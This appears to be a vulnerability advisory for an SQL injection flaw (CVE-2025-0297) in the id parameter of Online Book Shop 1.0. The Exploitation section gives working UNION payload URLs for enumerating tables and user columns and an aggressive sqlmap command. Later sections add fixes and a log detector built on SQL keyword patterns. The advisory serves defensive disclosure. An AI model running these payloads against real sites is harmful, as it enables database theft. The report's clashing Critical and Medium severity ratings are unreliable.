Online Book Shop 1.0, SQL Injection, CVE-2025-0297 (Critical)

The CVE-2025-0297 vulnerability in Online Book Shop 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /detail.php. This occurs due to improper sanitization of user-supplied input, enabling SQL injection. Attackers can manipulate database queries by injecting malicious SQL payloads, potentially leading to unauthorized data access, modification, or deletion. The vulnerability is exploitable without authentication, making it critical.

DailyCVE Form:

Platform: Online Book Shop
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/16/2025

What Undercode Say:

Exploitation:

1. Payload Example:

http://example.com/detail.php?id=1' UNION SELECT 1,2,3,4,5-- -

2. Database Enumeration:

http://example.com/detail.php?id=1' UNION SELECT 1,table_name,3,4,5 FROM information_schema.tables-- -

3. Data Extraction:

http://example.com/detail.php?id=1' UNION SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name='users'-- -

Protection:

1. Input Validation:

// Escaping only protects the query if $id is then placed inside quotes in the SQL string
$id = mysqli_real_escape_string($conn, $_GET['id']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT * FROM books WHERE id = ?");
$stmt->bind_param("i", $_GET['id']); // "i" binds the value as an integer
$stmt->execute();

3. WAF Rules:

# Blocks every request to detail.php, legitimate ones included
location ~ /detail\.php {
    deny all;
}

Analytics:

  • CVSS: 5.3 (Medium)
  • Attack Vector: Network
  • Impact: Data Confidentiality, Integrity

Detection:

1. SQLi Scanning:

sqlmap -u "http://example.com/detail.php?id=1" --risk=3 --level=5

2. Log Monitoring:

grep -Ei "UNION|SELECT" /var/log/apache2/access.log
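
A narrower check for the same access log, added here as an example and not taken from the original report or from the Online Book Shop code: it looks only at requests to /detail.php, percent-decodes the `id` value, and flags anything that is not a plain integer. The log lines, IP addresses and the /search.php path are constructed for illustration, and the Apache common log layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: client, [time], "METHOD target HTTP/x", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.+?) HTTP/[0-9.]+" (\d{3}) ')
# Tokens taken from the payloads shown on this page; used only to rank findings
SQL_HINT = re.compile(r"(?i)\b(?:union|select|information_schema)\b|'|--")

def suspicious_detail_requests(lines, path="/detail.php", param="id"):
    """Flag requests to `path` whose `param` value is not a plain integer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log request line
        client, when, target, status = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes, so encoded payloads are inspected in clear text
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"[0-9]+", value):
                continue  # the only shape a book id should have
            findings.append({
                "client": client, "time": when, "status": int(status),
                "value": value, "sql_hint": bool(SQL_HINT.search(value)),
            })
    return findings

# Constructed sample lines (documentation IP ranges; /search.php is hypothetical)
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Apr/2025:10:00:01 +0000] "GET /detail.php?id=7 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [16/Apr/2025:10:00:03 +0000] "GET /search.php?q=select+a+book HTTP/1.1" 200 901',
    '198.51.100.23 - - [16/Apr/2025:10:00:05 +0000] '
    '"GET /detail.php?id=1%27%20UNION%20SELECT%201,2,3,4,5--%20- HTTP/1.1" 200 4870',
    '198.51.100.23 - - [16/Apr/2025:10:00:09 +0000] "GET /detail.php?id=abc HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for finding in suspicious_detail_requests(SAMPLE_LOG):
        print(finding)
```

Unlike a keyword grep, this ignores the harmless /search.php line and still reports the non-numeric `id=abc` request, which carries no SQL keyword at all.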

Mitigation:

  • Patch `/detail.php` to sanitize inputs.
  • Disable error reporting in production.
  • Implement rate limiting.

(End of Report)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
